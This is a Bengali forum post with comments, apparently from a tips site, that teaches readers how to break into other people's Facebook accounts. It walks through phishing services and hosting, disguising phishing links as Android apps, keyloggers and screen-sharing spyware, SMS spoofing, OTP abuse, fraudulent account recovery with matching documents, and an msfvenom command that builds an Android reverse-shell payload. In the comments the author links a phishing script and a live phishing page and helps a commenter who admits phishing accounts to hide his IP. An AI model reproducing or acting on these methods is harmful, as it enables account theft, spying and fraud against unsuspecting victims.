জগতে মানুষের মনকে যেহেতু বশ(হ্যাক) করা সম্ভব তাই নিশ্চিত রূপে জেনে থাকুন যে সাইবার জগতে সবকিছু হ্যাক করা সম্ভব (তবে এখানে সহজ আর কঠিন কথাটা মাথায় রাখা উচিত) সুতরাং ১০০% গ্যারান্টি দিলে বলা যায় “ফেসবুক হ্যাক পসিবল”।
ফেসবুক হ্যাক বলতে বোঝায়
(১) সরাসরি ফেসবুক সার্ভার হ্যাক
(২) অন্যের ফেসবুক আইডি হ্যাক
আসুন একটু ডিটেইলস ডিসকাস করা যাক
(১) ফেসবুক সার্ভার হ্যাক: ফেসবুক যেহেতু একটি ওয়েবসাইট তাই এতে ভার্নাবিলিটি( দূর্বলতা) থাকা স্বাভাবিক আর হ্যাকারেরা এই সিকিউরিটির ফাঁকে প্রতিনিয়ত ফেসবুক আইডি হ্যাক করার চেষ্টা করছে। ঠিক এই মুহূর্তে আমি যখন এই আর্টিকেল লিখছি তখন বিশ্বের হাজার তরুণ হ্যাকার ফেসবুক সার্ভারে এট্যাক করার চেষ্টা করছে। তবে জনপ্রিয় ফেসবুক ওয়েবসাইটের অথোরিটি তাদের সিকিউরিটি এতোটাই শক্তিশালী করার চেষ্টারত আছেন যে তাতে প্রায় ৯৯.৯৯% হ্যাকারই বিফল হন সেটা তো বলাই বাহুল্য।
আর সবচেয়ে মজার কথা হলো ফেসবুকের সিকিউরিটির অন্যতম এক্সপার্ট হলো পৃথিবীর বেশ নামী দামী হ্যাকারেরা তাই এখানে “চোর যখন পাহারদার তখন দায়িত্বই হলো ঈমানদারী” তাই এক্ষেত্রে ফেসবুক হ্যাক প্রায় অসম্ভব( রিপিট আমি প্রায় বলেছি)।
(২) অন্যের ফেসবুক আইডি হ্যাক: এই কাজটা যারপরনাই সহজ আবার সচেতন ভিক্টিম(যার আইডি হ্যাক করতে চান তিনিই ভিক্টিম) এর ক্ষেত্রে খুবই কঠিন। ফেসবুক একাউন্ট হ্যাক করার কতোগুলা মেথড আছে সেগুলি নিম্নরূপ:
(ক) ফিশিং: যেকোনো ওয়েবসাইট এর নকল পেইজ তৈরী করে ভিক্টিম’কে পাঠিয়ে তাতে লগিন করতে পাম্পিং করার নামই ফিশিং। পূর্বে ওয়াপকাতে সহজভাবে ফেসবুক ফিশিং সাইট তৈরী করা গেলেও বর্তমানে ওয়াপকা ফিশিং সাইট ব্লক করে দেয়। তবে একইভাবে আপনি যেকোনো ফ্রি হোস্টিং সাইট হতে এমন ফিশিং সাইট তৈরী করতে পারেন যেমন www.000webhost.com ইত্যাদি। এছাড়াও অনলাইনে আপনি www.anomor.com অথবা www.shadowave.com ( www.shadowave.info) কিংবা http://z-shadow.info হতে একটি একাউন্ট খুলে সেখান হতে ফিশিং লিংক সংগ্রহ করে ভিক্টিমকে পাঠাতে পারেন এবং ভিক্টিম যদি তাতে লগিন করে তবে আপনার ঐ একাউন্টে তার ইউসার ডিটেইলস(যেমন ইউজার আইডি/ইমেইল) এবং পাসওয়ার্ড পেয়ে যাবেন।
যেহেতু এখন সবাই ফিশিং সম্পর্কে সাম্যক অবগত তাই আপনি উক্ত ফিশিং লিংক হতে একটি এনড্রোয়েড এপ্স বানিয়ে নিতে পারেন যেন ভিক্টিম সরাসরি লিংক’টি সনাক্ত করতে না পারেন।এরকম লিংক হতে এপ্স কনভার্ট করতে পারেন www.web2apk.com কিংবা https://gonative.io/ ইত্যাদি হতে।
(খ) কিলগার: মূলত ভিক্টিমের সকল টাইপিং লেটার পাওয়ার উপায় হলো এই কি লগার যেন ভিক্টিম কি কি টাইপ করছে তা আপনি জানতে পারেন আর ভিক্টিম যদি ফেসবুকে লগিন করে তবে পাসওয়ার্ড টাইপিং করার সময় তা ডিভাইসে(পিসি/মোবাইল) এ সেভ করে রাখার সিস্টেমই হলো কিলগিং।
ধরুন আপনি আপনার ফ্রেন্ডকে বললেন আপনার মোবাইলে অনেক মেগাবাইট আছে সে যেন চাইলে ফেসবুক একাউন্ট ব্যবহার করতে পারে তাহলে আপনার বন্ধু যখন প্রলুব্ধ হয়ে তার একাউন্টে লগিন করবে তখন আপনার ডিভাইসে তার লগিন করা পাসওয়ার্ড সেভ হয়ে থাকবে।
এমনি একটি কিলগার হলো Hackers Keyboard → https://m.apkpure.com/hacker-s-keyboard/org.pocketworkstation.pckeyboard

তবে এডভান্স মেথডে এখন অনেক কিলগার তৈরি করা সম্ভব যাতে দূরের যে কারো ডিভাইসে উক্ত কিলগার ইনস্টল করিয়ে তা হতে রিমোটিক ডাটা এনালাইসিস করা সম্ভব যেমন আপনার কম্পিউটার/এনড্রোয়েডে এমন একটি কিলগার ইনস্টল থাকবে যেন আপনি কি কি টাইপ করছেন সেটার কপি ডিরেক্ট আমি আমার ইমেইলে পেয়ে যাবো।
দিনে দিনে সিকিউরিটি যতো বাড়বে হ্যাকিং ওয়্যেও ততোই বাড়বে।
(গ) স্ক্রিন রেকর্ডার: ঠিক কি লগারের মতোই এমন একটি মেথড হলো স্ক্রিন রেকর্ডার যেখানে ভিক্টিম ডিভাইসে কি করছে তা সরাসরি ভিডিও রেকর্ড হয়ে থাকবে আর সেখান হতেই পাসওয়ার্ড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারবেন।
এমনি স্ক্রিন রেকর্ডার এপ্স( রুট+ননরুট) AZ Screen Recorder → https://m.apkpure.com/az-screen-recorder-no-root/com.hecorat.screenrecorder.free
(ঘ) স্ক্রিন শেয়ারিং: ভিক্টিম তার মোবাইলে কি কি করছে তা আপনি দূর হতেই লাইভ দেখতে পারেন স্ক্রিন শেয়ারিং সফটওয়ার হতে; কার্যত এভাবে ভিক্টিমের ফেসবুক আইডির এক্সেস নিতে কিংবা ডিটেইলস জানতে পারেন।
এটি মূলত ইন্টারনেট সংযোগের উপর ভিত্তি করে ভিক্টিম ডিভাইস এবং রিসিভার এর মাঝের তথ্য আদান প্রদান করে আর ফেসবুক চালাতে যেহেতু ইন্টারনেট সংযোগ বাধ্যতামূলক তাই এই পদ্ধতিটি অবলম্বন করা যেতেই পারে( উল্লেখ্য এক্ষেত্রে দুটি ডিভাইসেই একই সফটওয়ার ইনস্টল থাকা বাধ্যতামূলক)।
এমন একটি এপ্স হলো screen Sharing → https://m.apkpure.com/screen-share-oneassistant/nfo.oneassist
(ঙ) স্ফুপিং: ধরুন আপনার মোবাইল যদি সরাসরি ফেসবুক হতে একটি আসে যে ” keep safe your account from hacker by clicking this link http://blablablablabla.com” তাহলে নিশ্চয়ই আপনি তাতে ক্লিক করে দ্বিধাবোধ করবেন না কেননা মেসেজটি তো সরাসরি ফেসবুক হতে এসেছে তাইনা?
ঠিক এভাবে আপনি উক্ত http://blablablablabla.com এর স্থলে ফিশিং লিংক হতে ভিক্টিম আইডির এক্সেস নিতে পারবেন।
এক্ষেত্রে ঐ Facebook হতে আসা মেসেজটি হলো আদতে বাল্ক মেসেজ আর এটাকে আসলে মেসেজ স্পুফিং একইরূপ আপনি ইমেইল স্পুফিং কিংবা কল স্পুফিংও করতে পারেন।
(চ) আইপি এড্রেস: ফেসবুক আইডি হ্যাক করার অন্যতম একটি সহজ উপায় হলো এই আইপি এড্রেস। মূলত আপনার আইপি এড্রেস এবং পোর্ট হতে নিম্নোক্ত কমান্ডে $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > /sdcard/test.apk (পিসি হলে লিনাক্স বা উইন্ডোজ এবং এনড্রোয়েড হলে টার্মিনাল) একটি ম্যালওয়েল( মূলত এনড্রোয়েড রিমোটিক এক্সেস)এপ্স বানাতে পারেন যা হতে আপনি ভিক্টিমের এনড্রোয়েডের এক্সেস নিয়ে তা হ্যাক করতে পারবেন।
(ছ) রিমোটিক এক্সেস: হ্যাকার ভিক্টিমের কম্পিউটার/এনড্রোয়েড রিমোটিক এক্সেস নিয়ে তার ফেসবুক আইডি হ্যাক করতে পারেন। মোবাইলের ক্ষেত্রে আপনি নিম্নোক্ত https://web.airdroid.com/ ওয়েবসাইট এর সহায়তায় ভিক্টিম এনড্রোয়েডে আপনি একটি স্পাইয়িং সফটওয়ার ইনস্টল এবং রেজিস্টার করে পরবর্তীতে পাসওয়ার্ড রিসেট করে আপনার একাউন্ট হতে মেসেজ বক্সে আসা রিসেট কোড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারেন।
(জ) ওয়ান টাইম পাসওয়ার্ড: ভিক্টিমের ফেসবুকে যুক্ত থাকা মোবাইল নাম্বার হতে আপনি otp লিখে 32665 নাম্বারে মেসেজ করলে ফিরতি মেসেজে একটি টেম্পরারি কোড পাবেন যা হতে ভিক্টিমের একাউন্টে এক্সেস নিতে পারবেন।
উল্লেখ্য এইখানে তার আইডিতে যুক্ত মোবাইল নাম্বারটি জানতে হবে এবং অতি অল্প সময়ের জন্য হলেও সেই নাম্বারটি ব্যবহার করার মতোন অবসর পেতে হবে।
(ঝ) ব্রুটফোর্স: ফেসবুকে যেহেতু ইমেইল আইডি/মোবাইল নাম্বার না জেনেও সরাসরি আইডি কোড/ইউসারনেম এবং পাসওয়ার্ড দিয়ে লগিন করা যায় তাই ফেসবুকে ব্রুটফোর্স এট্যাক খুবই পপুলার হতো; তবে যেহেতু ক্যাপচা সিস্টেম আছে তাই ব্রুটফোর্স কার্যত অচল। তথাপি গেসিং মেথডে ম্যানুয়ালি ভিক্টিম আইডিতে একের পর এক চেষ্টা চালিয়ে গেলে সফলতা আসতে পারে; এক্ষেত্রে পাসওয়ার্ড লিস্ট আপনাকে ভিক্টিম সম্পর্কে তথ্য জেনে তা এনালাইসিস পূর্বক তৈরী করে নিতে জানতে হবে।
আশ্চর্য হলেও সত্য এই কাজটা যেমন সহজ তেমনি ফলপ্রদ তবে আপনার ব্রেইন’কে কঠিন চিজ তৈরী করাটা আপনার দায়িত্ব।
(ঞ) রিকোভারী: ফেসবুকে অন্যের বার্থডে এবং নাম জেনে ডকুমেন্ট সাবমিট করে তাতে এক্সেস নেবার নামই রিকোভারী; আদতে এমন এক্সেস নেবার জন্যই রিকোভারী হতে তা হ্যাকিং নামে পরিচিত। এক্ষেত্রে এমন ডকুমেন্ট সাবমিট করতে হবে যেন তাতে ভিক্টিমের নাম+বার্থডে মিল থাকে( ফেসবুক গ্রহণ করে এমন ডকুমেন্টের ভেতর আছে ন্যাশনাল আইডি কার্ড/পাসপোর্ট/ড্রাইভিং লাইসেন্স ইত্যাদি)। উল্লেখ্য এমনিভাবে করতে অবশ্যই আপনাকে ভিক্টিম সিস্টেমের সহিত আপনার Mac এক্সচেঞ্জ করে নেওয়া উচিত।
আমি পরে এই বিষয়টি নিয়ে আলাদা আরো ডিটেইলস একটি টিউন করবো।
(চ) সেশন হাইজ্যাকিং: ভিক্টিমের একই নেটওয়ার্কে তার ব্রাউজারের কুকিজ হাইজ্যাক করে সরাসরি ফেসবুকে এক্সেস নেওয়ার নামই হলো সেশন হাইজ্যাকিং। বর্তামনে ফেসবুক https:// প্রটোকল ব্যবহার করে এবং http:// রিডিরেক্ট হয় https:// প্রটোকলে তাই এমনটি বর্তমানে অসম্ভব তাই একসময়ের এতো পপুলার ফেসনিফ এপ্স আসলে অকার্যকর। তথাপি একই নেটওয়ার্কে এক্টিভ থাকা দুটি সিস্টেমের একটির ব্রাউজারের কুকিজ হতে ভিন্ন ব্রাউজারে তার কুকিজ হাইজ্যাক করে( সেশন হাইজ্যাক করে) কমপ্লেক্সি হ্যাকিং সম্ভবপর।

শেষকথা: হ্যাকিং বিদ্যার শেষ নাই তবুও আজ হতেই যদি হ্যাকিং শিক্ষার শুরু করেন তবে সফল যে আপনি হবেন-ই-হবেন তা সুনিশ্চিত; সময়টা আজ অথবা কাল তবে শিক্ষা কখনো বিফলে যায়না।

[পূর্বে টিটিসিতে প্রকাশিত আমার লেখা, যার প্রুফ ট্রিকবিডি সাপোর্ট টিম যাচাই করতে পারেন আমার টিউনার আইডির এক্সেস হতে ]
ধন্যবাদ

68 thoughts on "নিয়নবাতি [পর্ব-০৯] ফেসবুক আইডি হ্যাকিং এর সাতকাহন!"

  1. Torikul Islam Author says:
    Onnek vlo…. thanks
    1. Nishan Ahammed Neon Author Post Creator says:
      welcome
  2. Shadin Contributor says:
    সবটা পোস্ট পড়লাম।
    দারুণ লাগল।
    আর শ্রীঘই ‘রিকোভারী’ সম্পর্কে পোস্টটা করেন।
    1. Nishan Ahammed Neon Author Post Creator says:
      ইনশাআল্লাহ পাবেন ভাই
    2. Nishan Ahammed Neon Author Post Creator says:
      ইনশাআল্লাহ ভাইয়া
    3. Shadin Contributor says:
      হুম
  3. Ahmed ShahriaR Contributor says:
    সম্পূর্ণ পোষ্ট টি পড়লাম।
    হ্যাক না করতে পাড়লেও হ্যাকিং এর মজা নেওয়া যাবে।
    1. Nishan Ahammed Neon Author Post Creator says:
      শুভকামনা রইলো
    1. Nishan Ahammed Neon Author Post Creator says:
      ধন্যবাদ ভাইয়া
    1. Nishan Ahammed Neon Author Post Creator says:
      না ভাইয়া আমি কোন হ্যাকার নই
  4. imranhasan Contributor says:
    ভাইয়া আপনার কাছে যদি Facebook Pishing সাইট এর wordprees theme থাকে দেন প্লিজ
    1. Nishan Ahammed Neon Author Post Creator says:
      থিম নেই তবে একটি স্ক্রিপ্ট আছে যা js ফরম্যাটে ডাউনলোড লিংক → https://www.mediafire.com/download/1i5bkvcf5xvmnt5
    2. Shadin Contributor says:
      স্ক্রিপটা সাইটে আপলোতের পর কিভাবে হ্যাক করার কাজটা করব?
    3. Shadin Contributor says:
      আপলোড
    4. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া এটা জাভাস্ক্রিপ্ট যেখান উপরোক্ত স্ক্রিপ্ট’টি আপলোডেড wml ফরমে সাইটে ফিশিং পেইজ শো ডাউন করবে, ধন্যবাদ ভাইয়া
    5. Shadin Contributor says:
      ওকে। ধন্যবাদ।
    6. Hasan Mehedi Contributor says:
      এটাতো huzaifaham এর কোড টা মে বি। আর একজন বলছিলো যে huzaifaham এর কোড টা এমবেড করে ব্যবহার করা রিস্কি, কারণ আমি যে পাসওয়ার্ড গুলা পাবো উনিও এগুলা পাবে,এটা কি সত্য?
    7. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া এমনটা হতে পারে তবে আমি বলবো আপনি স্ক্রিপ্টটি আগে আপনার সার্ভারে আপ করুন তারপর তা হতে ফিশিং সাইট তৈরী করুন তাহলে নিশ্চিন্ত হতে পারবেন। অন্যের আপ করা সাইটের লিংক হতে নিজের ফিশিং তৈরী করা বোকামী
    8. FarhanBD24 Contributor says:
      bai apnar facebook id er link ta den……..apnar sathe kisu kotha ase…..

      Ar wapka to bondo hoye jasse to ata kibabe wordpress e phising site banabo sei somporke help koren

    9. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া আমি যতোটুকু সময় অনলাইনে থাকি তাই ফেবুর চেয়ে ট্রিকবিডি কি ভালো নয়?
    10. Hasan Mehedi Contributor says:
      হ্যা আমি সবগুলা ডাউনলোড করে নিজের সাইটে আপলোড করে করেছিলাম? তবুও ভয় লাগতো।
    1. Nishan Ahammed Neon Author Post Creator says:
      ধন্যবাদ
  5. Tarek Hossai Contributor says:
    ভাই আপনার ইউটিউব চ্যানেল আছে? থাকলে চ্য্যনালের লিংক টা দিন।
    1. Nishan Ahammed Neon Author Post Creator says:
      না ভাইয়া, আমার ইউটিউব চ্যানেল নেই, দুঃখিত
    1. Nishan Ahammed Neon Author Post Creator says:
      ধন্যবাদ ভাইয়া
  6. Sajeeb Contributor says:
    mind blowing post bro…. keep it go ahead
    1. Nishan Ahammed Neon Author Post Creator says:
      ধন্যবাদ ভাইয়া
    1. Fardin Error Contributor says:
      Vi tomer post gulo
    2. Fardin Error Contributor says:
      Owesome lage
    3. Nishan Ahammed Neon Author Post Creator says:
      ধন্যবাদ ভাইয়া
    4. Nishan Ahammed Neon Author Post Creator says:
      শুকরিয়া ভাইয়া
  7. mdriaz.rs Contributor says:
    ভাল লাগলো,,,
  8. mdriaz.rs Contributor says:
    আর ভাইয়া আপনার ওয়েবাসাইটের নাম কি???
    1. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া আমার পারসোনাল ওয়েবসাইট প্রমোট করার জায়গা ট্রিকবিডি নয় ; যদিওবা সেটার একটা নিয়ম আছে তবুও তা ব্যক্তি হীনতার পরিচায়ক
    2. হাসিব Contributor says:
      ভাই……. কথা টা ভাল্লাগছে খুব
  9. $r@b0n99 Contributor says:
    Android diye kivabe seson hijacking korbo plz bro reply den
    1. Nishan Ahammed Neon Author Post Creator says:
      এটা নিয়ে পড়ে হয়তো লিখবো এমন নয় যে আমি চাইলেই লেখা হয়ে গেল কেননা এমন একটি বিষয় যা সবার জন্য বোধগম্য করে লেখার জন্য আগে নিজে তো ভালো করে জানা উচিত তাইনা? আমার অজ্ঞতা আমার লজ্জা নয় বরং আমার শেখার আগ্রহে অনুপ্রেরণা
  10. Tanvir Ahmed Author says:
    চমৎকার। ভাই ফেজবুক কিকি প্রোগামিং দ্বারা তৈরি?
    ৬ য়ের অপেক্ষায় আছি,,
    1. Nishan Ahammed Neon Author Post Creator says:
      ৩/৪ দিনের ভেতর ইনশাল্লাহ পাবেন
  11. Nurul Contributor says:
    Creative post
  12. Jaman Contributor says:
    সুন্দর
  13. Hasan Mehedi Contributor says:
    উল্লেখ্য এমনিভাবে করতে অবশ্যই আপনাকে ভিক্টিম সিস্টেমের সহিত আপনার Mac এক্সচেঞ্জ করে নেওয়া উচিত। এটা আবার বুঝিয়ে বলেন।
    1. Nishan Ahammed Neon Author Post Creator says:
      ৬ষ্ঠ পর্ব পাবেন
  14. Hasan Mehedi Contributor says:
    আর আমি ফিশিং এর মাধ্যমে এফবি আইডি হ্যাক করি বাট তেমন কেউ বুঝে না। বাট একটা সমস্যা হ্যাক হওয়া আইডিতে যখন প্রবেশ করি তখন ফেসবুক আইপি এড্রেস রেখে দেয়া যা বড় সমস্যা। তাই vpn ইউজ করা শুরু করছিলাম,vpn দিয়ে ৮/১০ টা আডিতে প্রবেশ করছিলাম বাট ওই সবগুলাই লক হয়ে গেছে। তারপর proxynova থেকে প্রক্সি নিয়ে firefox দিয়ে প্রবেশ করার ট্রাই করছিলাম বাট বেশি স্লো। আর প্রবেশের পর অবশ্য আপি আমরটা হাড করা থাকে। এখন আমার আইপি হাইড করে কিভাবে বাংলাদেশি আইপি ব্যবহার করে ফেসবুকে ঢুকতে পারবো? আপনি হ্যাকিং বিষয়ক পোস্ট দেন বলে আপনাকে কোশ্চেনটা করলাম…
    1. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া, এতো টেনশন নেন কেন??

      আপনি হয়তো জানেন যে আপনি যদি ওয়াইফাই ব্যতীত সীম প্রোভাইডারের ডাটা প্লান ব্যবহার করেন তবে সাব আইপি পেয়ে থাকেন যা হতে আপনার রিয়েল আইডি হলো R-S-R হয়ে থাকে ;অর্থাৎ একটি আইপি রেঞ্জে সাব আইপি নিয়ত বদলায়। ভাইয়া এটা ভিপিএন তো নয় তবে আপনার আসল আইপিও ঠিক প্রকাশ পায়না। আর প্রকৃত এ্যানোনিমাস হতে আপনাকে পেইড ভিপিএন ব্যবহার করার পরামর্শ দেওয়া হলো।

      আর ভাইয়া, আপনি Bangladeshi proxy লিখে গুগল সার্চ করেও আপনি বাংলাদেশি ফ্রি প্রক্সি ব্যবহার করতে পারেন [সেটিং করে নিয়েন]

      আর নেট একটু স্লো হবে এটা মেনে নিতেই হবে তবে সার্ভার কন্ডিশন বুঝে চয়েজ করলে আশা করি উপকৃত হতে পারবেন

    2. Hasan Mehedi Contributor says:
      এইরকম করা যায় না? আমি কারো আইডি হ্যাক করলাম দ্যন ওর আইপি পেলাম,ওটা একটু একটু ডিজিট চেঞ্জ করে whois লুকআপ দিয়ে চেক করে পোর্ট স্ক্যনার দিয়ে পোর্ট বের করে যদি ইউজ করি তাহলে কি কোন সমস্যা হবে?
  15. Maruf Contributor says:
    ভালো পোষ্ট চালিয়ে যান ।

    শুনলাম ওয়াপকা নাকি বন্ধ হয়ে যাবে ।

    কিভাবে একটি ফিশিং সাইট বানাব প্লিজ একটু হেল্প করেন ।

    1. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া, ওয়াপকা বন্ধ হয়ে যাবে এটা সত্য কথা। আমি চেষ্টা করছি ভাইয়া যতোটা সহজে সম্ভব তা তুলে ধরার। ততোদিন এনেমোর বা শ্যাডোওয়েভ তো আছেই। আর একটু আগে জাভাস্ক্রিপ্ট হতে ব্লগার দিয়ে ফিশিং তৈরীও করেছিলাম (কোড এমব্রোড করে) তবে তাতে তো পাসওয়ার্ড পাওয়া যাবে না শুধু শো ডাউন হচ্ছে। আমি চেষ্টা করছি ভাইয়া
    2. Nishan Ahammed Neon Author Post Creator says:
      একটু আগে বলেছিলাম যে ব্লগার দিয়ে ফিশিং তৈরী করার কথা ; শুনতে সত্যিই হাসি আসাটাই সহজাতভাবে স্বাভাবিক কেননা ব্লগার কোন হোস্টিং নয় এটা কেবল পারফেক্ট রাইটিং প্লাটফর্ম।

      তবে দেখুন ব্লগার দ্বারা তৈরী ফিশিং পেইজ
      https://phishboook.blogspot.com/?m=1

      কাউকে লগিন করার জন্য নিষেক করা হইলো যদিও এটা শুরুতে লিখেই দিয়েছি।

      আসলে হ্যাকিং করতে দামী দামী কম্পিউটার লাগেনা লাগে শুধু মেধা আর একটু বিকল্প ভাবনার মতোন চিন্তাশক্তি।

      আর হ্যা, এমব্রোড করা কোড যেথায় হোস্ট করা হয়েছে সেখানে লগিন ইনফো পাবেন।
      ধন্যবাদ

  16. sifatboy Author says:
    দারুণ পোস্ট ভাইয়া, চালিয়ে জান…
  17. Esrafil Islam Emon Contributor says:
    Vary gd post bro,crray on
  18. Pobel Contributor says:
    darun bro
  19. Pobel Contributor says:
    darun bro
  20. SilentHeart Contributor says:
    Airdroid er system ta ektu bujai bolen!eita dia ki remotely app install kora jay onno phone e?
    1. Nishan Ahammed Neon Author Post Creator says:
      ভাইয়া এটা কঠিন তবে গুগল প্লে হতেও রিমোটিক ইনস্টল করা যায় কিন্তু সেটআপ তো মেনুয়ালিই করতে হবে তাইনা?
  21. Love11 Contributor says:
    bah vai apner post gulu khub vala lage
  22. binzam Contributor says:
    ভাই আপনার পোস্ট পড়ে মনে হই বই পড়তাছি
    চেষ্টা কইরেন সাবলীল বাংলা দেওয়ার জন্য আর
    সাধু ভাষা না দিলে ভালো হই চলিত ভাষা ব্যবহার কইরেন
    আর কিছু শব্দ ব্যবহার করতাছেন যেগুলা অর্থ বোঝা কুঠিন হচ্ছে

    ভাই আপনাকে ধন্যবাদ
    আমি হ্যাকার না হতে পারি কিন্তু কিভাবে হ্যাকার থেকে রক্ষা পাওয়া যায় সেটা ত জানতাছি

    আগে নিজে সুরক্ষিত হওয়া
    তারপর হ্যাকার হওয়া

    ধন্যবাদ ভাই

  23. Munna hossain Sagor Contributor says:
    vae amar facbook account like comment action blocked hoase gese plase helpe uuuu
  24. Ahmed Marjan Contributor says:
    vai, kuno phising site i kaj kore na.
    1. Nishan Ahammed Neon Author Post Creator says:
      সঠিকভাবে ট্রাই করুন অবশ্যই কাজ করবে; এগুলা সর্বসাধারণ প্রুফড ফিশিং সাইট
    2. Ahmed Marjan Contributor says:
      ei site gula kaj kore jani. Tobe ami to konotari phising link e dukte parsi na. Apni please ekbar try kore dekhun na anomor kaj kore ki na.
  25. Shiblul Bari Contributor says:
    ভাই ফেসবুক কি হ্যাক করা সম্ভব। আমাকে জানাবেন।
    1. Nishan Ahammed Neon Author Post Creator says:
      উপরের এতো বড় পোস্টের মাঝেই উত্তরটা লুকিয়ে আছে; আমার মতামত নয় বিচার করার দায়িত্ব আপনার তাই প্রয়োজনে পোস্ট আবার পড়ুন

Leave a Reply